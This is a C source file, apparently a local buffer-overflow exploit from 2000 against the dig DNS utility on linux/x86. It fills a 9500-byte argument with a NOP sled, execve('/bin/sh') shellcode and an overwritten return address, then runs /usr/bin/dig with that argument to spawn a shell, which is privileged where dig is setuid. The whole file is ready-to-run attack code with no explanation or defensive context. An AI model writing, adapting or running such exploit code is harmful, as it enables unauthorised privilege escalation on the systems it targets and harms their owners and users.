/*
   private
   dig v2.2 local exploit example for linux/x86
   
   note that dig isn't suid/sgid on some platforms, yet on some it is. 
   
   - anathema <anathema@hack.co.za>
*/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

main(int argc, char **argv)
{
  char buf[9500];
  int i,offset=2000;

  char shellc[] =
    "\xeb\x1d\x5e\x29\xc0\x88\x46\x07\x89\x46\x0c\x89\x76\x08\xb0\x0b"
    "\x87\xf3\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\x29\xc0\x40\xcd\x80\xe8"
    "\xde\xff\xff\xff/bin/sh";

  long addr=&addr;

  addr+=offset;
  memset(buf, 0x90, 9087-strlen(shellc));
  for(i=0;i < sizeof(shellc);i++) buf[i+9087-strlen(shellc)] = shellc[i];
  buf[9090] = (addr & 0xff000000) >> 24;
  buf[9089] = (addr & 0x00ff0000) >> 16;
  buf[9088] = (addr & 0x0000ff00) >> 8;
  buf[9087] = (addr & 0x000000ff);

  execl("/usr/bin/dig", "dig", buf, NULL);
}

/* private */
/*                    www.hack.co.za              [2000]*/